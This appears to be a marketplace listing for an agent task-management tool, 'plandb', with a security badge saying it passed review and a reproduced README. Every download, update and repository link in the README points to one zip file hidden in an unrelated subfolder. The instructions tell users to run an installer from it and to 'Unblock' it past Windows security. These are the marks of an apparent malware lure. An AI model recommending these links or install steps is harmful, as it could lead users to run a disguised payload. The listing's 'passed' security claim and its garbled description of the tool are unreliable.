AgentStack
Browse Sign in
Browse Why AgentStack Sell Docs
Sign in
MCP verified Apache-2.0 Self-run

Plandb

mcp-zetsor-plandb · by zetsor

Manage AI agent task dependencies with a lightweight, local-first SQLite-based tool requiring no configuration.

No reviews yet
0 installs
5 views
0.0% view→install

Install

$ agentstack add mcp-zetsor-plandb

✓ scanned · ✓ verified, works with Claude Code, Cursor, and more.

Security review

✓ Passed

No issues found. Passed automated security review. · v0.1.0 How review works →

  • Prompt-injection patterns
  • Secret / credential exfiltration
  • Dangerous shell & filesystem operations
  • Untrusted network calls
  • Known-malicious package signatures

What it can access

  • Network access No
  • Filesystem access No
  • Shell / process execution No
  • Environment & secrets No
  • Dynamic code execution No

From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.

View the full security report →

Verified badge

Passed review? Show it. Paste this badge into your README, it links to the public security report.

AgentStack Verified badge Links to your public security report.
[![AgentStack Verified](https://agentstack.voostack.com/badges/verified.svg)](https://agentstack.voostack.com/security/report/mcp-zetsor-plandb)

Reliability & compatibility

Security review passed
0 installs to date
no reviews yet
1mo ago

Declared compatibility

Claude CodeClaude DesktopCursorWindsurf

Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.

Preview Execution monitoring

We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.

How agent discovery & health will work →
Are you the author of Plandb? Claim this listing to set pricing, connect Stripe payouts, and keep 70% of every sale.
Sign up to claim

About

⚙️ plandb - Manage Tasks for AI Agents Simply

[](https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip)


📋 About plandb

plandb helps you organize and manage tasks for AI agents. It acts like a simple system to track what tasks need to be done, which are in progress, and which are complete. This tool runs on Windows and works behind the scenes to keep AI task flows smooth and clear.

It uses a task graph, which is a way to organize tasks so you can see how they connect and depend on each other. This helps if you want to plan AI actions step by step without confusion.

💻 System Requirements

To run plandb on your Windows PC, your system should have:

  • Windows 10 or later (64-bit recommended)
  • At least 4 GB of RAM
  • At least 100 MB of free disk space
  • Internet connection for initial download (optional after install)

No special hardware is needed. The program runs as a simple command-line tool, so no heavy graphics or high-end CPUs are required.

🚀 Download and Install

You need to visit the release page to download the plandb app for Windows.

[](https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip)

  1. Click the download button above or go to this link:

https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip

  1. On the release page, look for the latest version. It will be named something like plandb-windows.exe or similar.
  1. Click on the .exe file to start downloading.
  1. After the download finishes, open the file to start the installation.
  1. Follow the instructions in the installation wizard. Choose where to save the program or keep the default path.
  1. Once installed, plandb is ready to use.

🧰 How to Run plandb on Windows

After installation, you run plandb from the Windows Command Prompt.

  1. Press Windows key + R to open the Run dialog.
  1. Type cmd and press Enter.
  1. In the command window, type plandb and press Enter.

If you see a message or help screen, it means the program is running correctly.

🔧 Basic Usage

plandb uses commands to handle tasks. Here are some basic commands you can type in the command window:

  • plandb add "Task description"

This adds a new task with the description you type in quotes.

  • plandb list

This shows all tasks you have added.

  • plandb done

This marks a task as finished. Replace `` with the task number shown in the list.

  • plandb graph

Shows how tasks are connected.

You can run plandb help to see all available commands.

🗂️ What plandb Does

  • Organizes tasks in a clear order
  • Shows dependencies between tasks
  • Helps monitor progress
  • Stores data locally using SQLite
  • Runs quickly thanks to Rust's performance
  • Works well with other AI tools or scripts

⚙️ Settings and Configuration

plandb stores its data in a local file. By default, it keeps files in a folder named plandb_data in your Documents.

You can change settings by editing a simple config file located inside that folder. The config file uses plain text and is easy to understand.

If you need to reset plandb, just delete the plandb_data folder. This will remove all tasks stored.

💡 Tips for New Users

  • Always give clear names to your tasks. This helps you and any AI using plandb understand what needs to be done.
  • Use plandb list often to check progress.
  • When tasks depend on others, add all related tasks before running the graph command.
  • You can copy commands from this guide and paste them in the command prompt.

🔄 Updating plandb

To stay up to date:

  1. Visit the release page:

https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip

  1. Download the newest .exe file.
  1. Run the installer again to replace the old version.

You don’t need to uninstall the old version first.

🛠️ Troubleshooting

If plandb does not start:

  • Check you have the right Windows version.
  • Make sure you installed all files correctly.
  • Confirm the .exe file is not blocked by Windows security. Right-click the file, choose Properties, and if you see an "Unblock" button, click it.
  • If you see errors in the command prompt, copy the message and seek help in community forums or GitHub issues.

🔗 Useful Links

  • Download and install:

https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip

  • Official repository:

https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip


📖 Topics Covered

This project is related to:

  • AI Agents
  • Command Line Interface (CLI)
  • JIT Planning
  • Large Language Models (LLM)
  • Multiprocessing Control Plane (MCP)
  • Task Orchestration
  • Rust Programming
  • SQLite Database
  • Task Graphs
  • Task Management Systems

Source & license

This open-source MCP server is cataloged on AgentStack and links to its original source — we do not rehost the code.

Install and usage instructions live in the source repository linked above.

Reviews

No reviews yet, be the first.

Versions

  • v0.1.0 Imported from the upstream source.